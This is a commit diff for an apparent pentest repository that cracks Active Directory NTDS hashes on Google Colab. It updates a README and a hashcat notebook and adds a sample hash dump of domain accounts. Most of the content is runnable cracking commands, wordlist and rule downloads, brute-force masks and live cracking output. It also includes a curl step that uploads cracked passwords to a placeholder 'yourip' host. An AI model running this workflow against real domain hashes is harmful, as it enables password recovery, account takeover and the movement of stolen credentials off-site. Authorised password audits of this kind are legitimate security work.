Example NTDS

main
Swissky 2020-12-21 16:40:58 +01:00
parent 96088a98d8
commit e011bf2098
3 changed files with 333 additions and 175 deletions


@ -7,32 +7,46 @@ Néphélées (Νεφήλαι, Nephḗlai) : cloud nymphs greek - also ntds crack
## V1 - Google Colab ## V1 - Google Colab
Roll for Tesla P100
* https://github.com/ShutdownRepo/hashonymize * https://github.com/ShutdownRepo/hashonymize
* https://github.com/ShutdownRepo/google-colab-hashcat * https://github.com/ShutdownRepo/google-colab-hashcat
* https://github.com/mxrch/penglab * https://github.com/mxrch/penglab
* https://colab.research.google.com/drive/1arm1_HEMb868mk18FlLkEcqvHPB_Ibgb#scrollTo=lWPQqb3oETLd
```ps1 ```ps1
Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb Go on : https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb
Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU. Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU.
Change the config by setting "True" at tools you want to install. Change the config by setting "True" at tools you want to install.
Select "Runtime" and "Run all" ! Select "Runtime" and "Run all" !
Workflow example 3 (OPSEC: crack anonymized hashes)
run the preparation script below
on your local machine, run hashonymize to anonymize your hash lists
upload your anon hashes list on the colab !wget http://yourip:yourport/yourfile
run a hashcat command like this to start cracking !hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt
recover the .pot file from the Google Colab !curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/
on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt
hashcat -m 1000 --potfile-path ntds.cracked ntds.tocrack --show --username
``` ```
* markov, keyboard walking, dico + rules , haveibeenpwn * markov, keyboard walking, dico + rules , haveibeenpwn
* reuse old pot (extract passwd to new wordlist) * reuse old pot (extract passwd to new wordlist)
Here are some of the most used attack modes for the `--attack-mode` option
```
0 Wordlist (with or without rules)
3 Pure bruteforce
```
Here are some of the most used hash types for the `--hash-type` option
```ps1
1000 NTLM (actually its for NT hashes)
3000 LM
5500 Net-NTLMv1 (actually, it should be called NTLMv1)
5600 Net-NTLMv2 (actually, it should be called NTLMv2)
13100 Kerberoast
18200 ASREProast
22000 WPA-PBKDF2-PMKID+EAPOL
16800 WPA-PMKID-PBKDF2
0 md5
100 sha1
1400 sha2-256
1700 sha2-512
# 2 hours
-a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1
```
## V2 - UI ## V2 - UI
* https://github.com/Coalfire-Research/npk * https://github.com/Coalfire-Research/npk
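Review bot: the added `# 2 hours` and `-a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1` lines sit at the end of the hash-type list, inside the same fence, so they read as one more hash type, and the notebook in this same commit rates that mask at "around 3 hours on a p100". Move the mask into its own block next to the attack-mode list and settle on one estimate. The hash-type fence is tagged `ps1` although it holds a reference table, and `actually its for NT hashes` should read `it's`, as the notebook text has it. In the added workflow steps, `curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/` moves recovered passwords over plain HTTP; the README should tell the reader to use a TLS endpoint or a tunnel for that transfer.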


@ -3,10 +3,9 @@
"nbformat_minor": 0, "nbformat_minor": 0,
"metadata": { "metadata": {
"colab": { "colab": {
"name": "google-colab-hashcat.ipynb", "name": "google_colab_hashcat.ipynb",
"provenance": [], "provenance": [],
"collapsed_sections": [], "collapsed_sections": []
"include_colab_link": true
}, },
"kernelspec": { "kernelspec": {
"name": "python3", "name": "python3",
@ -18,169 +17,187 @@
{ {
"cell_type": "markdown", "cell_type": "markdown",
"metadata": { "metadata": {
"id": "view-in-github", "id": "bcgg59uiIxrv"
"colab_type": "text"
}, },
"source": [ "source": [
"<a href=\"https://colab.research.google.com/github/ShutdownRepo/google-colab-hashcat/blob/main/google_colab_hashcat.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>" "# Nephelees - NTDS cracking on Google Colab\r\n",
] "1. Select \"Runtime\", \"Change runtime type\", and set \"Hardware accelerator\" to GPU. \r\n",
}, "2. Select \"Runtime\" and \"Run all\" !\r\n",
{ "1. on your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\r\n",
"cell_type": "markdown", "2. upload your anon hashes list on the colab `!wget http://yourip:yourport/yourfile` or with the upload button\r\n",
"metadata": { "3. install requirements\r\n",
"id": "2ommePNS-o92" "4. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\r\n",
}, "5. recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/`\r\n",
"source": [ "6. on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\r\n",
"# Google colab hash cracking\n", "\r\n",
"\n", "**/!\\** For every 12hrs or so Disk, RAM, VRAM, CPU cache etc data that is on our alloted virtual machine will get erased. "
"<p align=\"center\">\n",
" <a href=\"https://colab.research.google.com/github/ShutdownRepo/google-colab-hashcat/blob/main/google_colab_hashcat.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>\n",
" <a href=\"https://twitter.com/intent/follow?screen_name=_nwodtuhs\" title=\"Follow\"><img src=\"https://img.shields.io/twitter/follow/_nwodtuhs?label=Shutdown&style=social\"></a>\n",
"</p>\n",
"\n",
"## Workflow example 1 (simple wordlist)\n",
"\n",
"This Google colab can be used for hash cracking with wordlists and rules.\n",
"Here is an example of that can be followed to crack NT hashes.\n",
"\n",
"1. run the preparation script below\n",
"2. upload your hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
"3. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
"\n",
"## Workflow example 2 (wordlist + rules)\n",
"\n",
"This is an example that is especially useful for internal engagements where users often use a transformation of the corp name as password (i.e. Corp2016!).\n",
"\n",
"1. create a wordlist based on some names that are currently used in the company\n",
"```\n",
"company\n",
"cpmny\n",
"corp\n",
"management\n",
"admin\n",
"```\n",
"2. upload your hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
"3. run the hashcat command `!hashcat --status --hash-type 1000 --attack-mode 0 --username --rules-file rules/d3adhob0.rule DOMAIN.LOCAL.ntds company.lst`\n",
"\n",
"## Workflow example 3 (OPSEC: crack anonymized hashes)\n",
"\n",
"1. run the preparation script below\n",
"2. on your local machine, run [hashonymize](https://github.com/ShutdownRepo/hashonymize) to anonymize your hash lists\n",
"3. upload your anon hashes list on the colab `!wget http://yourip:yourport/yourfile`\n",
"4. run a hashcat command like this to start cracking `!hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
"5. recover the .pot file from the Google Colab `!curl --upload-file ~/.hashcat/hashcat.potfile http://yourip:yourport/`\n",
"6. on your local machine, run the following hashcat command with the recovered potfile to match real usernames with cracked password `hashcat --potfile-path hashcat.potfile --hash-type 1000 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt`\n",
"\n",
"hashcat -m 1000 --potfile-path ntds.cracked ntds.tocrack --show --username\n",
"\n",
"## Short hashcat manual\n",
"\n",
"Here are some useful options\n",
"```\n",
"--status Enable automatic update of the status screen\n",
"--attack-mode Attack-mode, see references below\n",
"--hash-type Hash-type, see references below\n",
"--username Enable ignoring of usernames in hashfile \n",
"--rules-file Multiple rules applied to each word from wordlists\n",
"--potfile-path Specific path to potfile\n",
"```\n",
"\n",
"Here are some of the most used attack modes for the `--attack-mode` option\n",
"```\n",
"0 Wordlist (with or without rules)\n",
"3 Pure bruteforce\n",
"```\n",
"\n",
"Here are some of the most used hash types for the `--hash-type` option\n",
"```\n",
"1000 NTLM (actually it's for NT hashes)\n",
"3000 LM\n",
"5500 Net-NTLMv1 (actually, it should be called NTLMv1)\n",
"5600 Net-NTLMv2 (actually, it should be called NTLMv2)\n",
"13100 Kerberoast\n",
"18200 ASREProast\n",
"22000 WPA-PBKDF2-PMKID+EAPOL\n",
"16800 WPA-PMKID-PBKDF2\n",
"0 md5\n",
"100 sha1\n",
"1400 sha2-256\n",
"1700 sha2-512\n",
"```\n",
"\n",
"# Credits\n",
"Credits go to mxrch for his original project called [penglab](https://github.com/mxrch/penglab)"
]
},
{
"cell_type": "markdown",
"metadata": {
"id": "NMFCTYwaKtu7"
},
"source": [
"# Your hash cracking starts here"
] ]
}, },
{ {
"cell_type": "code", "cell_type": "code",
"metadata": { "metadata": {
"id": "7ucWO9luB4RG" "colab": {
"base_uri": "https://localhost:8080/"
},
"id": "A86GVzaW6YpT",
"outputId": "fbeb72d7-0174-4812-91fe-6e74dba550ce"
}, },
"source": [ "source": [
"# 1. Run the preparation basis\n", "# Check GPU (Tesla P100 is the best GPU on Colab)\r\n",
"# Edit the wordlists and rules you want\n", "!nvidia-smi -L"
"\n", ],
"rockyou = True\n", "execution_count": null,
"hashesorg2019 = False # huge wordlist (~12GB, ~6mins download)\n", "outputs": [
"quickrules = True # hob064.rule\n", {
"extensiverules = True # d3adhob0.rule\n", "output_type": "stream",
"\n", "text": [
"import os\n", "GPU 0: Tesla P100-PCIE-16GB (UUID: GPU-711e1706-fccb-c944-73a8-796eb7a9d342)\n"
"\n", ],
"def install():\n", "name": "stdout"
" rules_dir = \"rules\"\n", }
" wordlists_dir = \"wordlists\"\n", ]
" # Removing the default sample data\n", },
" !rm -r sample_data/\n", {
" # Installing hashcat\n", "cell_type": "code",
" print(\"[+] Installation of hashcat...\")\n", "metadata": {
" !apt install cmake build-essential -y\n", "id": "LWWa641VMu7Y"
" !apt install checkinstall git -y\n", },
" !git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install\n", "source": [
"\n", "# Install Hashcat\r\n",
" # Installing wordlists\n", "!apt install cmake build-essential -y\r\n",
" os.system(\"wordlists_dir={}\".format(wordlists_dir))\n", "!apt install checkinstall git -y\r\n",
" !mkdir ./$wordlists_dir\n", "!git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install"
" if rockyou:\n", ],
" !printf \"[+] Downloading the Rockyou wordlist...\\n\"\n", "execution_count": null,
" !cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\n", "outputs": []
" !printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\n", },
" !cd $wordlists_dir && gunzip rockyou.txt.gz\n", {
" !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\n", "cell_type": "code",
"\n", "metadata": {
" if hashesorg2019:\n", "id": "_M4BMeXCNCA8",
" !printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\n", "colab": {
" !cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\n", "base_uri": "https://localhost:8080/"
" !printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\n", },
" !cd $wordlists_dir && gunzip hashesorg2019.gz\n", "outputId": "f08a6696-17ca-4415-f572-402e96fb7717"
" !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\n", },
"\n", "source": [
" # Installing rules\n", "# Download wordlists\r\n",
" os.system(\"rules_dir={}\".format(rules_dir))\n", "import os\r\n",
" !mkdir ./$rules_dir\n", "wordlists_dir = \"wordlists\"\r\n",
" if quickrules:\n", "os.system(\"wordlists_dir={}\".format(wordlists_dir))\r\n",
" !printf \"[+] Downloading the hob064 ruleset...\\n\"\n", "!mkdir ./$wordlists_dir\r\n",
" !cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\n", "\r\n",
" !printf \"[+] Rules downloaded !\\n\"\n", "!printf \"[+] Downloading the Rockyou wordlist...\\n\"\r\n",
" !printf \"[+] Location : $(pwd)/$rules_dir/$(ls rules | grep hob064)\"\n", "!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/90/rockyou.txt.gz\r\n",
" if extensiverules:\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
" !printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\n", "!cd $wordlists_dir && gunzip rockyou.txt.gz\r\n",
" !cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\n", "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep rockyou)\"\r\n",
" !printf \"[+] Rules downloaded !\\n\"\n", "\r\n",
" !printf \"[+] Location : $(pwd)/$rules_dir/$(ls rules | grep d3adhob0)\"\n", "!printf \"[+] Downloading the KerberoastPW wordlist...\\n\"\r\n",
"\n", "!cd $wordlists_dir && wget https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\r\n",
"install()\n", "!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
"!printf \"\\n[+] Install is over, listing rules and wordlists...\\n\"\n", "!cd $wordlists_dir && unxz kerberoast_pws.xz\r\n",
"!ls rules wordlists" "!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep kerberoast_pws)\"\r\n",
"\r\n",
"!printf \"[+] Downloading the HashesOrg2019 wordlist...\\n\"\r\n",
"!cd $wordlists_dir && wget https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\r\n",
"!printf \"[+] Wordlist downloaded !\\n[+] Extraction...\\n\"\r\n",
"!cd $wordlists_dir && gunzip hashesorg2019.gz\r\n",
"!printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep hashesorg2019)\"\r\n",
"\r\n",
"# !printf \"[+] Downloading the Have I been Pwned V7 wordlist...\\n\"\r\n",
"# !cd $wordlists_dir && wget https://hashes.org/download.php?type=found&hashlistId=8161 -O \tHaveIbeenPwnedV7.txt\r\n",
"# !printf \"[+] Wordlist downloaded !\\n[+]\\n\"\r\n",
"# !printf \"[+] Finished !\\n[+] Location : $(pwd)/$wordlists_dir/$(ls wordlists | grep HaveIbeenPwnedV7)\"\r\n"
],
"execution_count": 20,
"outputs": [
{
"output_type": "stream",
"text": [
"mkdir: cannot create directory ./wordlists: File exists\n",
"[+] Downloading the Rockyou wordlist...\n",
"--2020-12-21 15:03:51-- https://download.weakpass.com/wordlists/90/rockyou.txt.gz\n",
"Resolving download.weakpass.com (download.weakpass.com)... 104.21.234.151, 104.21.234.150, 2606:4700:3038::6815:ea97, ...\n",
"Connecting to download.weakpass.com (download.weakpass.com)|104.21.234.151|:443... connected.\n",
"HTTP request sent, awaiting response... 200 OK\n",
"Length: 53357062 (51M) [application/octet-stream]\n",
"Saving to: rockyou.txt.gz\n",
"\n",
"rockyou.txt.gz 100%[===================>] 50.88M 11.8MB/s in 5.3s \n",
"\n",
"2020-12-21 15:03:56 (9.59 MB/s) - rockyou.txt.gz saved [53357062/53357062]\n",
"\n",
"[+] Wordlist downloaded !\n",
"[+] Extraction...\n",
"gzip: rockyou.txt already exists; do you wish to overwrite (y or n)? ^C\n",
"[+] Finished !\n",
"[+] Location : /content/wordlists/rockyou.txt\n",
"rockyou.txt.gz[+] Downloading the KerberoastPW wordlist...\n",
"--2020-12-21 15:05:19-- https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\n",
"Resolving gist.github.com (gist.github.com)... 192.30.255.113\n",
"Connecting to gist.github.com (gist.github.com)|192.30.255.113|:443... connected.\n",
"HTTP request sent, awaiting response... 301 Moved Permanently\n",
"Location: https://gist.githubusercontent.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz [following]\n",
"--2020-12-21 15:05:19-- https://gist.githubusercontent.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz\n",
"Resolving gist.githubusercontent.com (gist.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...\n",
"Connecting to gist.githubusercontent.com (gist.githubusercontent.com)|151.101.0.133|:443... connected.\n",
"HTTP request sent, awaiting response... 200 OK\n",
"Length: 98784072 (94M) [application/octet-stream]\n",
"Saving to: kerberoast_pws.xz.1\n",
"\n",
"kerberoast_pws.xz.1 100%[===================>] 94.21M 185MB/s in 0.5s \n",
"\n",
"2020-12-21 15:05:21 (185 MB/s) - kerberoast_pws.xz.1 saved [98784072/98784072]\n",
"\n",
"[+] Wordlist downloaded !\n",
"[+] Extraction...\n",
"unxz: kerberoast_pws: File exists\n",
"[+] Finished !\n",
"[+] Location : /content/wordlists/kerberoast_pws\n",
"kerberoast_pws.xz\n",
"kerberoast_pws.xz.1[+] Downloading the HashesOrg2019 wordlist...\n",
"--2020-12-21 15:05:21-- https://download.weakpass.com/wordlists/1851/hashesorg2019.gz\n",
"Resolving download.weakpass.com (download.weakpass.com)... 104.21.234.150, 104.21.234.151, 2606:4700:3038::6815:ea97, ...\n",
"Connecting to download.weakpass.com (download.weakpass.com)|104.21.234.150|:443... connected.\n",
"HTTP request sent, awaiting response... 200 OK\n",
"Length: 4468104490 (4.2G) [application/octet-stream]\n",
"Saving to: hashesorg2019.gz\n",
"\n",
"hashesorg2019.gz 100%[===================>] 4.16G 11.7MB/s in 6m 0s \n",
"\n",
"2020-12-21 15:11:21 (11.9 MB/s) - hashesorg2019.gz saved [4468104490/4468104490]\n",
"\n",
"[+] Wordlist downloaded !\n",
"[+] Extraction...\n",
"[+] Finished !\n",
"[+] Location : /content/wordlists/hashesorg2019"
],
"name": "stdout"
}
]
},
{
"cell_type": "code",
"metadata": {
"id": "d1cxo70DQDxs"
},
"source": [
"# Download rules\r\n",
"import os\r\n",
"rules_dir = \"/content/hashcat/rules\"\r\n",
"os.system(\"rules_dir={}\".format(rules_dir))\r\n",
"!mkdir ./$rules_dir\r\n",
"\r\n",
"!printf \"[+] Downloading the hob064 ruleset...\\n\"\r\n",
"!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule\r\n",
"!printf \"[+] Rules downloaded !\\n\"\r\n",
"!printf \"[+] Location : $(ls $rules_dir | grep hob064)\"\r\n",
"\r\n",
"!printf \"[+] Downloading the d3adhob0 ruleset...\\n\"\r\n",
"!cd $rules_dir && wget https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule\r\n",
"!printf \"[+] Rules downloaded !\\n\"\r\n",
"!printf \"[+] Location : $(ls $rules_dir | grep d3adhob0)\""
], ],
"execution_count": null, "execution_count": null,
"outputs": [] "outputs": []
@ -202,17 +219,99 @@
{ {
"cell_type": "code", "cell_type": "code",
"metadata": { "metadata": {
"id": "xYgvNWGbKXSp" "id": "xYgvNWGbKXSp",
"colab": {
"base_uri": "https://localhost:8080/"
},
"outputId": "cfbf1c6b-7d90-4108-fefa-e7566ad718b1"
}, },
"source": [ "source": [
"# 3. Crack your hashes\n", "# 3. Crack your hashes\n",
"# Examples\n", "\n",
"# !hashcat --status --hash-type 1000 --attack-mode 0 --username DOMAIN.LOCAL.ntds wordlists/rockyou.txt\n", "# Quick cracking - rockyou wordlist - around 10 minutes\n",
"# !hashcat --status --hash-type 1000 --attack-mode 0 --username --rules-file rules/hob064.rule DOMAIN.LOCAL.ntds company.lst\n", "# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --username\n",
"!hashcat --benchmark" "# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/hob064.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/rockyou.txt --rules-file /content/hashcat/rules/dive.rule --username\n",
"\n",
"# Medium cracking - kerberoast wordlist - around 30 minutes\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/hob064.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/kerberoast_pws --rules-file /content/hashcat/rules/dive.rule --username\n",
"\n",
"# Insane cracking - hashesorg2019 wordlist - several days ?\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --username\n",
"!hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/hob064.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/d3adhob0.rule --username\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O -a 0 /content/*.ntds /content/wordlists/hashesorg2019 --rules-file /content/hashcat/rules/dive.rule --username\n",
"\n",
"# ----- around 3 hours on a p100 ------\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1\n",
"# ----- more than 3 days on a P100 --------\n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a \n",
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a"
], ],
"execution_count": null, "execution_count": null,
"outputs": [] "outputs": [
{
"output_type": "stream",
"text": [
"hashcat (v6.1.1-120-g15bf8b730) starting...\n",
"\n",
"\u001b[31mnvmlDeviceGetFanSpeed(): Not Supported\u001b[0m\n",
"\n",
"CUDA API (CUDA 10.1)\n",
"====================\n",
"* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU\n",
"\n",
"OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]\n",
"========================================================================\n",
"* Device #2: Tesla P100-PCIE-16GB, skipped\n",
"\n",
"Minimum password length supported by kernel: 0\n",
"Maximum password length supported by kernel: 27\n",
"\n",
"Hashes: 45 digests; 45 unique digests, 1 unique salts\n",
"Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates\n",
"Rules: 64\n",
"\n",
"Applicable optimizers applied:\n",
"* Optimized-Kernel\n",
"* Zero-Byte\n",
"* Precompute-Init\n",
"* Meet-In-The-Middle\n",
"* Early-Skip\n",
"* Not-Salted\n",
"* Not-Iterated\n",
"* Single-Salt\n",
"* Raw-Hash\n",
"\n",
"Watchdog: Temperature abort trigger set to 90c\n",
"\n",
"INFO: Removed 27 hashes found in potfile.\n",
"\n",
"Host memory required for this attack: 983 MB\n",
"\n",
"Dictionary cache hit:\n",
"* Filename..: /content/wordlists/hashesorg2019\n",
"* Passwords.: 1279729109\n",
"* Bytes.....: 13733214816\n",
"* Keyspace..: 81902662976\n",
"\n",
"\u001b[33mCracking performance lower than expected?\u001b[0m\n",
"\u001b[33m\u001b[0m\n",
"\u001b[33m* Update your backend API runtime / driver the right way:\u001b[0m\n",
"\u001b[33m https://hashcat.net/faq/wrongdriver\u001b[0m\n",
"\u001b[33m\u001b[0m\n",
"\u001b[33m* Create more work items to make use of your parallelization power:\u001b[0m\n",
"\u001b[33m https://hashcat.net/faq/morework\u001b[0m\n",
"\u001b[33m\u001b[0m\n",
"[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => "
],
"name": "stdout"
}
]
} }
] ]
} }
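Review bot: every command in this cell writes to `--potfile-path /content/cracked.pot`, but step 5 of the instructions added in this commit retrieves `~/.hashcat/hashcat.potfile`, which these runs never write to; point step 5 at `/content/cracked.pot`. The only uncommented line is the hashesorg2019 + hob064 run under the "several days ?" heading, so "Run all" starts the longest wordlist job by default where the old cell ran `--benchmark`; leave the rockyou line active instead. `/content/*.ntds` should be a single file name: if the glob matches more than one file, hashcat takes the first as the hash list and the rest as dictionaries. The committed output (ANSI escape sequences, ending at the interactive prompt) should be cleared before commit.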

ntds/example.ntds Normal file

@ -0,0 +1,45 @@
Administrator:500:111f37ed915c5716aad3b435b51404ee:eb37f9cd74303274cb923442a7348ef4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:422feb7ef3b8cbea98bf9f0f76a50d81:::
ADDEMO$:1003:aad3b435b51404eeaad3b435b51404ee:d5d1a3d8e2ee4032ec4831c9f9342309:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f031bf1f16bba6f9de84dffcc164e0f8:::
user01:1106:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
user02:1107:aad3b435b51404eeaad3b435b51404ee:e550853afc9a68106d73fd6680b25604:::
user03:1108:56c94ea187dbb8d6d4b8a9676de6053e:9aeae4ad385c29a8d3e25a2032df95ec:::
user04:1109:58ee1ecfcb1952c1aad3b435b51404ee:2a54f9c00701830e44923a19eea7df62:::
user05:1110:22d8afdd59cc02d1aad3b435b51404ee:336413710df33e5d6ef4ba82ba762543:::
user06:1111:843201b3eec511e619d76dfe3931be22:8810b6cff094d7bbfa9254a47e460e8c:::
user07:1112:d0d0b0a89785fea7dacc48edf1058ae1:d10107259670c218d8389bb05a6ca9a5:::
user08:1113:eb9fdbf6dde9d8a3c3f5ba53c6ea977d:81ed9d39c208fb710f16fd01df2c5ea3:::
user09:1114:ee3c975e9312263ac2265b23734e0dac:0d870c8d2ed66211a6cd19b6c8c6939a:::
user10:1115:e69e57fcbfc3742627bcbf149915a329:c1d5ff9561074a64e8164745f7e057a3:::
user11:1116:aad3b435b51404eeaad3b435b51404ee:125fee170ce858738fc08d61291174ed:::
user12:1117:3c152122664981d07a01665eb2eb6c14:3081116936973f2a1019178a085e77cd:::
user13:1118:aad3b435b51404eeaad3b435b51404ee:3f77a049f85d9ecb089313d68dc64796:::
user14:1119:6595863b3f65214eaad3b435b51404ee:7f5ab070d31e61251ab4ef78b6601941:::
user15:1120:8dfa87789573aa6caad3b435b51404ee:0794f987708fd36dc158c3435d1e9d65:::
user16:1121:bfa8b0f05b2ce944158759f68c114883:f85bbc519f1d4b9453d0d316d2f43efd:::
user17:1122:63aa06ca844a0123aad3b435b51404ee:5bd6fddd235507a2baf82843b6174b4e:::
user18:1123:aad3b435b51404eeaad3b435b51404ee:8d15a7e3fe3271b73180de20f9532111:::
user19:1124:078198d4eefc6c55aad3b435b51404ee:c09c4e921a0f7763e22aa5f38d73016a:::
user20:1125:44f388db34bb96628358f3d2c80c1dc5:9180c11efd4cb6149557f59b0cf80573:::
user21:1126:fdcfc2afb2d1be34aad3b435b51404ee:adc5df4b1f4a1b2501bbeef236f5be92:::
user22:1127:9fdfa4280126e140aad3b435b51404ee:2a3d0e353eadfb8c7b5d7d503efad47d:::
user23:1128:b273d8f0d4cb5bbcaad3b435b51404ee:b6c0168748dcdba30141914c959d9f8c:::
user24:1129:6d91129363e71245aad3b435b51404ee:e14af367857363b0f16418bcce9f96b9:::
user25:1130:9ad12257392cdacaaad3b435b51404ee:c57128805cc3e445a338126080ce52bb:::
user26:1131:12bd073e0404ed39aad3b435b51404ee:024b7f87b902332ac1369f2fd1a1d4e9:::
user27:1132:d12e81eacd737b89aad3b435b51404ee:23f8c70f8c51c5535e4ef372ffe9500a:::
user28:1133:adfc3aa0a57f3d1e944e2df489a880e4:458d16d08f6ba7c5c61cd3850b704015:::
user29:1134:5971713f415d2ff41104594f8c2ef12b:85ec40bb1fadfcd4f1cdd8f5c745338a:::
user30:1135:9ede745407ca42b2036d85e885962cfa:584c3288cdb9249191d01028fc3c1d06:::
user31:1136:3ceb8cc097f4b3bc274d6a66ff41a32b:a474953d36f287fefc73f8917ca27290:::
user32:1137:863a6a296d3d379888d84c068ac05e0a:80fadb7eb493333387c36c3a30a86a9c:::
user33:1138:e7c148e3c455aa1f8138c5e16c20cfc5:236ff73b5ec46c68c37d27d51bd4fa8f:::
user34:1139:c8e4acdacab3b81243b673bc86137536:2fce06c6e6303f0850416dfe57f809ac:::
